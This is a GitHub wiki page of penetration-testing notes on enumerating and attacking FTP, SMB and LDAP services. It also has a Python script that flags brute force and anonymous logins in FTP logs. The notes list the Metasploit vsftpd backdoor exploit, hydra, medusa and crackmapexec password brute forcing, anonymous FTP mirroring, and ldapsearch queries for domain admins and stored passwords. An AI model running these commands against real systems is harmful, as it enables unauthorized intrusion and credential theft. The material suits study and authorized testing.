Services Hacking - singirikondamani/Noted GitHub Wiki

FTP Enumeration:

  • Start with an nmap scan of the FTP port - nmap -sV -sC -T4 -p 21 0.0.0.0
  • Identify the version of the FTP server and any critical information that can be useful for further enumeration.
  • Start Metasploit - run msfconsole -q
  • Search for the FTP exploit module - search vsftpd
  • Use the module - use exploit/unix/ftp/vsftp_234_backdoor
  • Set RHOST and RPORT and run the exploit

FTP Password Enumeration or Brute force:

  • Use hydra: hydra -L username.txt -P password.txt 0.0.0.0 ftp OR
  • Use medusa: medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp

FTP login or access via:

  • ftp 0.0.0.0 (if anonymous authentication is enabled, you can log in without valid credentials)
  • netcat 0.0.0.0 21
  • telnet 0.0.0.0 21
  • openssl s_client -connect 10.129.14.136:21 -starttls ftp

Download all available files as the anonymous user (recursive mirror):

wget -m --no-passive ftp://anonymous:<password>@<FQDN/IP>/
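From the defensive side, the hydra/medusa brute force and the anonymous login described above leave a clear footprint in the FTP server log. The following is an added example, not part of the original notes: it parses constructed vsftpd-style log lines (the IPs reuse the ones in the notes, the timestamps and users are made up) and flags sources that exceed a failure threshold, successes that follow such a run, and anonymous logins.

```python
import re
from collections import Counter

# Constructed vsftpd-style sample log (not captured from a real host).
SAMPLE_LOG = """\
Mon Mar  4 10:00:01 2024 [pid 2101] [fiona] FAIL LOGIN: Client "10.129.203.7"
Mon Mar  4 10:00:01 2024 [pid 2103] [fiona] FAIL LOGIN: Client "10.129.203.7"
Mon Mar  4 10:00:02 2024 [pid 2105] [fiona] FAIL LOGIN: Client "10.129.203.7"
Mon Mar  4 10:00:02 2024 [pid 2107] [fiona] FAIL LOGIN: Client "10.129.203.7"
Mon Mar  4 10:00:03 2024 [pid 2109] [fiona] FAIL LOGIN: Client "10.129.203.7"
Mon Mar  4 10:00:03 2024 [pid 2111] [fiona] OK LOGIN: Client "10.129.203.7"
Mon Mar  4 10:05:00 2024 [pid 2201] [anonymous] OK LOGIN: Client "10.129.14.136", anon password "user@example"
Mon Mar  4 10:06:00 2024 [pid 2301] [bob] FAIL LOGIN: Client "10.10.10.5"
Mon Mar  4 10:06:30 2024 [pid 2303] [bob] OK LOGIN: Client "10.10.10.5"
"""

# Matches the "[user] OK|FAIL LOGIN: Client "<ip>"" part of a vsftpd login line.
LINE_RE = re.compile(
    r'^\S+ \S+\s+\d+ \S+ \d{4} \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)

def parse_ftp_log(text):
    """Yield (user, result, client) for every login line; unrelated lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("user"), m.group("result"), m.group("client")

def analyze_ftp_log(text, fail_threshold=5):
    """Return brute-force sources, logins that succeeded after a failure run, and anonymous logins."""
    fails = Counter()          # failed attempts per client IP
    brute_sources = set()
    success_after_fails = []   # (client, user) pairs: likely guessed credentials
    anonymous = []
    for user, result, client in parse_ftp_log(text):
        if result == "FAIL":
            fails[client] += 1
            if fails[client] >= fail_threshold:
                brute_sources.add(client)
        else:
            if fails[client] >= fail_threshold:
                success_after_fails.append((client, user))
            if user.lower() == "anonymous":
                anonymous.append(client)
    return {
        "brute_force_sources": sorted(brute_sources),
        "success_after_brute_force": success_after_fails,
        "anonymous_logins": anonymous,
    }
```

A single failed attempt (bob) stays below the threshold, so only the fiona run and the anonymous session are reported.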

SMB Enumeration:

  • Start with an nmap scan - sudo nmap 10.129.14.128 -sV -sC -p139,445
  • Check for a null session - smbclient -N -L //<FQDN/IP>
  • Connect to a specific share - smbclient //<FQDN/IP>/<share>
  • Interact with the target over RPC - rpcclient -U "" <FQDN/IP>
  • Username enumeration with the Impacket scripts - samrdump.py <FQDN/IP>
  • smbmap is used for enumerating SMB shares and permissions, not for cracking usernames or passwords - smbmap -H <FQDN/IP>
  • enum4linux-ng.py only gathers and enumerates information from the target system; it does not interact with SMB to perform actions such as writing, uploading or modifying files - enum4linux-ng.py <FQDN/IP> -A
  • Brute force the username or password:
  1. crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
  2. hydra -L users.txt -P passwords.txt smb://192.168.1.10

To perform LDAP enumeration on the target network and find out the number of users associated with the domain

Use the tool: ldapsearch

  1. Step: the ldapsearch tool is installed by default on Parrot OS
  2. Step: to identify the base, run → sudo su → ldapsearch -h
  3. Get all information from the directory (the version is also available in the same output) → ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "(objectClass=*)"
  4. List the users: ldapsearch etc/openldap/ldap.config
  5. Get the list of users: run ldapsearch -h → ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "objectclass=Users"
  6. Get details of a specific user: ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "(sAMAccountName=johndoe)"
  7. Retrieve specific attributes for a user: ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "(sAMAccountName=johndoe)" cn mail memberOf
  8. **Retrieve administrative accounts:** → ldapsearch -x -h <ldap_server> -b "DC=CEHORG,DC=COM" "(memberOf=CN=Domain Admins,CN=Users,DC=CEHORG,DC=COM)"
  9. List all users and their password attributes: ldapsearch -x -h <ldap_server> -b "DC=CEHORG,DC=COM" "(objectClass=user)" sAMAccountName userPassword
  10. **Retrieve user passwords (if available)** → ldapsearch -x -h <ldap_server> -b "DC=CEHORG,DC=COM" "(sAMAccountName=johndoe)" userPassword

Remaining things: all service enumeration
